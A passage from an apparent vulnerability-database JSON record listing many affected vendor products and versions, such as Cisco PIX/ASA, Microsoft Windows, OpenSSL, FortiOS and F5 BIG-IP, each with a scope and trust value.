"vendor": "cisco",
"version": "4.2.1"
},
{
"_id": null,
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "cosminexus developer professional",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.2.1"
},
{
"_id": null,
"model": "ons t31 omds metro wdm system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "15532"
},
{
"_id": null,
"model": "blackberry enterprise server for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "4.1.4"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.19"
},
{
"_id": null,
"model": "opensolaris build snv 116",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "blackberry enterprise server express for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "5.0.2"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1.(2.48)"
},
{
"_id": null,
"model": "6.4-releng",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "windows server r2 datacenter",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20080"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.8"
},
{
"_id": null,
"model": "cosminexus developer",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "5.0"
},
{
"_id": null,
"model": "-release-p2",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.1"
},
{
"_id": null,
"model": "virtual connect 8gb 24-port fc module",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "3.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(2)78"
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.45.7"
},
{
"_id": null,
"model": "project openssl 0.9.8f",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.6"
},
{
"_id": null,
"model": "linux enterprise sdk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.6"
},
{
"_id": null,
"model": "windows vista enterprise 64-bit edition sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.1.2"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1.1"
},
{
"_id": null,
"model": "appliance server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "3.0"
},
{
"_id": null,
"model": "windows server enterprise edition itanium",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20030"
},
{
"_id": null,
"model": "windows vista home basic",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.7"
},
{
"_id": null,
"model": "coat systems packetshaper",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(4)7"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.4"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.7"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(2)74"
},
{
"_id": null,
"model": "meeting exchange sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.4"
},
{
"_id": null,
"model": "fuji",
"scope": null,
"trust": 0.3,
"vendor": "turbolinux",
"version": null
},
{
"_id": null,
"model": "project openssl b",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "windows server enterprise edition itanium sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "virtual connect 8gb 24-port fc module",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "2.0"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "windows server standard edition sp1 beta",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20031"
},
{
"_id": null,
"model": "blackberry enterprise server express for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "4.1.4"
},
{
"_id": null,
"model": "opensolaris build snv 99",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "cms server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "15.0"
},
{
"_id": null,
"model": "unified callmanager 4.1 sr5",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "netbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "netbsd",
"version": "4.0.2"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.4.5"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(2.79)"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.4.2"
},
{
"_id": null,
"model": "blackberry enterprise server for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "5.0.2"
},
{
"_id": null,
"model": "bigip global traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.3.1"
},
{
"_id": null,
"model": "linux lts amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "cosminexus studio web edition",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "4"
},
{
"_id": null,
"model": "arubaos",
"scope": "ne",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.3.3.2"
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.36"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1(5)"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0"
},
{
"_id": null,
"model": "ace appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "47100"
},
{
"_id": null,
"model": "opensolaris build snv 49",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.25"
},
{
"_id": null,
"model": "linux mipsel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "csm",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0(8)6"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.1"
},
{
"_id": null,
"model": "coat systems blue coat reporter",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "9.1.5.1"
},
{
"_id": null,
"model": "windows advanced server sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.3"
},
{
"_id": null,
"model": "blackberry enterprise server express for exchange mr1",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "5.0.2"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.13"
},
{
"_id": null,
"model": "windows vista edition sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "x64"
},
{
"_id": null,
"model": "http server",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.4.27"
},
{
"_id": null,
"model": "unified ip phone 8.0 sr2",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "web server r2",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "4.1"
},
{
"_id": null,
"model": "unified ip phone 8.0 sr1",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "1.4.2"
},
{
"_id": null,
"model": "windows server datacenter edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "fwsm for cisco catalyst series",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6500/76002.3.1"
},
{
"_id": null,
"model": "oracle11g enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.2.0.1.0"
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"_id": null,
"model": "web server r4",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "4.1"
},
{
"_id": null,
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.2.2"
},
{
"_id": null,
"model": "opensolaris build snv 78",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "esx server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "3.5"
},
{
"_id": null,
"model": "security agent for cvp",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.14.5.1.639"
},
{
"_id": null,
"model": "windows advanced server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "unified callmanager sr5c",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1"
},
{
"_id": null,
"model": "wireless lan solution engine",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "11302.0.5"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "2.1"
},
{
"_id": null,
"model": "ucosminexus application server standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7"
},
{
"_id": null,
"model": "windows terminal services sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "unified callmanager 3.3 sr2b",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.7.7"
},
{
"_id": null,
"model": "windows server standard edition sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "6.3-release-p10",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.2.13"
},
{
"_id": null,
"model": "java system directory server 2003q4",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5.2"
},
{
"_id": null,
"model": "openvms secure web server",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "2.1-1"
},
{
"_id": null,
"model": "windows server enterprise edition sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2008"
},
{
"_id": null,
"model": "message networking mn",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"_id": null,
"model": "cosminexus developer light",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6"
},
{
"_id": null,
"model": "open-enterprise-server",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "0"
},
{
"_id": null,
"model": "enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.0.3"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "3.2.1"
},
{
"_id": null,
"model": "linux lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"_id": null,
"model": "java enterprise system 2005q4",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "java system directory server 2005q1",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5.2"
},
{
"_id": null,
"model": "opensolaris build snv 120",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "openoffice",
"scope": "ne",
"trust": 0.3,
"vendor": "openoffice",
"version": "3.2.1"
},
{
"_id": null,
"model": "tivoli endpoint manager",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2.1310"
},
{
"_id": null,
"model": "circle",
"scope": "eq",
"trust": 0.3,
"vendor": "voodoo",
"version": "1.1.37"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.5"
},
{
"_id": null,
"model": "matrix operating environment",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.5"
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0.2"
},
{
"_id": null,
"model": "windows xp 64-bit edition version sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "java se sr6",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "blackberry enterprise server express for domino mr1",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "5.0.2"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0(8)3"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"_id": null,
"model": "apache",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.8"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "7.1-release-p4",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10000"
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.6"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.0.7"
},
{
"_id": null,
"model": "firefox",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.2"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.11"
},
{
"_id": null,
"model": "meeting exchange sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "http server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0"
},
{
"_id": null,
"model": "firewalll",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.4"
},
{
"_id": null,
"model": "windows server standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003x64"
},
{
"_id": null,
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.2"
},
{
"_id": null,
"model": "video surveillance operations manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.27"
},
{
"_id": null,
"model": "cosminexus application server standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0"
},
{
"_id": null,
"model": "netbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "netbsd",
"version": "5.0.1"
},
{
"_id": null,
"model": "network collector",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1"
},
{
"_id": null,
"model": "beta",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.0"
},
{
"_id": null,
"model": "bigip application security manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.4.8"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.8"
},
{
"_id": null,
"model": "messaging application server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5"
},
{
"_id": null,
"model": "opensolaris build snv 35",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "apache",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.5"
},
{
"_id": null,
"model": "desktop extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "db2 universal database fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.16"
},
{
"_id": null,
"model": "system management homepage",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.0.0.95"
},
{
"_id": null,
"model": "windows xp tablet pc edition sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "voice portal sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.6.4"
},
{
"_id": null,
"model": "windows vista ultimate sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "software opera web browser",
"scope": "ne",
"trust": 0.3,
"vendor": "opera",
"version": "10.50"
},
{
"_id": null,
"model": "intuity audix lx sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "ironport encryption appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.34"
},
{
"_id": null,
"model": "onboard administrator",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "3.31"
},
{
"_id": null,
"model": "unified callmanager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2"
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(4)27"
},
{
"_id": null,
"model": "oracle11g enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.0.7"
},
{
"_id": null,
"model": "blackberry enterprise server for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "5.0"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.2.2"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.11"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(3)006"
},
{
"_id": null,
"model": "windows ultimate",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "70"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.0"
},
{
"_id": null,
"model": "wireless lan controller module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "db2 universal database fix pack",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "9.19"
},
{
"_id": null,
"model": "windows server standard edition sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3.0"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.6.1"
},
{
"_id": null,
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "unified callmanager 4.1 sr4",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "bigip sam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "8.0"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "11.4"
},
{
"_id": null,
"model": "openvms secure web server",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.3"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(1)13"
},
{
"_id": null,
"model": "syslog-ng premium edition 3.2.1b",
"scope": "ne",
"trust": 0.3,
"vendor": "balabit",
"version": null
},
{
"_id": null,
"model": "oracle11g standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.7"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.2.3"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "0"
},
{
"_id": null,
"model": "etherfast befsr81 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"_id": null,
"model": "bigip application security manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.2.5"
},
{
"_id": null,
"model": "mobile wireless transport manager",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1(2)"
},
{
"_id": null,
"model": "systems insight manager c.05.00.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "linux lts i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "1.4.3"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "34000"
},
{
"_id": null,
"model": "coat systems director",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "5.5"
},
{
"_id": null,
"model": "project openssl d",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "opensolaris build snv 59",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "windows datacenter server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "apache",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.1"
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.37"
},
{
"_id": null,
"model": "oracle10g enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.4"
},
{
"_id": null,
"model": "csm",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "2.1(4)"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "12.1"
},
{
"_id": null,
"model": "windows vista home basic 64-bit edition sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "windows advanced server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.4.8"
},
{
"_id": null,
"model": "oracle11g enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.2.0.2.0"
},
{
"_id": null,
"model": "apache",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.13"
},
{
"_id": null,
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "10.10"
},
{
"_id": null,
"model": "windows server datacenter edition itanium sp1 beta",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20031"
},
{
"_id": null,
"model": "windows server for x64-based systems sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2008"
},
{
"_id": null,
"model": "firepass",
"scope": null,
"trust": 0.3,
"vendor": "f5",
"version": null
},
{
"_id": null,
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.2"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.3"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1(3)"
},
{
"_id": null,
"model": "ons",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "15540"
},
{
"_id": null,
"model": "3-dns",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.6.3"
},
{
"_id": null,
"model": "ucosminexus client",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.7"
},
{
"_id": null,
"model": "cosminexus developer professional",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.4.1"
},
{
"_id": null,
"model": "syslog-ng premium edition 3.0.7a",
"scope": "ne",
"trust": 0.3,
"vendor": "balabit",
"version": null
},
{
"_id": null,
"model": "matrix operating environment",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.3.2"
},
{
"_id": null,
"model": "project openssl a",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1(4)"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(1)2"
},
{
"_id": null,
"model": "-release-p3",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.4"
},
{
"_id": null,
"model": "java system web server sp7",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.0"
},
{
"_id": null,
"model": "jre 1.5.0 09",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "bigip global traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0.1"
},
{
"_id": null,
"model": "project openssl f",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "vcenter update",
"scope": "ne",
"trust": 0.3,
"vendor": "vmware",
"version": "4.11"
},
{
"_id": null,
"model": "java system web server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "7.0"
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1.1.3"
},
{
"_id": null,
"model": "opensolaris",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "0"
},
{
"_id": null,
"model": "enterprise linux ws extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "interactive response",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "windows xp home",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.7"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.10"
},
{
"_id": null,
"model": "windows server web edition",
